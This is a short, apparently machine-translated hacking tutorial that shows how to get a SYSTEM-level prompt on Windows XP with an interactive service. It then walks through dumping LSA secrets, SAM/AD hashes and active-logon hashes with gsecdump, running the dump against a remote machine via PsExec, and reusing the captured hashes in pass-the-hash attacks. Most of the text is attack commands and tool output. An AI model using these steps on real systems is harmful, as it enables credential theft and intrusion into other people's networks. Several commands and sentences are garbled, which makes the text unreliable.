Author: pt007 [at] vip.sina.com
To get a DOS Prompt as NT system:
C:> SC create shellcmdline binpath = "C: windowssystem321_.exe/K start" type = own type = interact
[SC] CreateService SUCCESS
C:> SC start shell1_line
[SC] StartService FAILED 1053:
The service did not respond to the start or control request in a timely fashion.
C:> SC delete shellcmdline
[SC] DeleteService SUCCESS
------------
Then in the new DOS window:
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C: WINDOWSsystem32> whoami
NT AUTHORITYSYSTEM
C: WINDOWSsystem32> gsecdump-h
Gsecdump v0.6 by Johannes Gumbel (johannes.gumbel@truesec.se)
Usage: gsecdump [options]
Options:
-H [-- help] show help
-A [-- dump_all] dump all secrets
-L [-- dump_lsa] dump lsa secrets
-W [-- dump_wireless] dump microsoft wireless connections
-U [-- dump_usedhashes] dump hashes from active logon sessions
-S [-- dump_hashes] dump hashes from SAM/AD
Although I like to use:
Export xec v1.83-Execute processes remotely
Copyright (C) 2001-2007 Mark Russinovich
Sysinternals-www.sysinternals.com
C:> export xec \ COMPUTER-u user-p password-s-f-c gsecdump.exe-u> Active-HASH.TXT
To get the hashes from active logon sessions of a remote system.
These are a lot better than getting a cachedump of the Cached Credentials because these hashes are LMHashes that can be easily broken with Rainbow Tables.
Note: You can use iam in the pshtools toolkit to import the HASH information captured by gsecdump to the local lsass process to implement the hash injection attack. It is still a great deal for foreigners. Now the Administrator is busy, LM/NThash and gethash obtained during ARP spoofing do not actually need to crack the password. This is a tool. The original Article is good, no matter whether the password is set to 4-bit or 127-bit, as long as there is hash, 100% can be done.
Download URL aspx? Cid = 223 & AspxAutoDetectCookieSupport = 1 "> http://www.truesec.com/PublicStore/ (X (1) S (1dtq2g45g1fhbd45tcvi2dal)/catq2/ categoryinfo. aspx? Cid = 223 & AspxAutoDetectCookieSupport = 1
Source: http://truesecurity.se/blogs/murray/archive/2007/03/16/why-an-exposed-lm-ntlm-hash-is-comparable-to-a-clear-text-password.aspx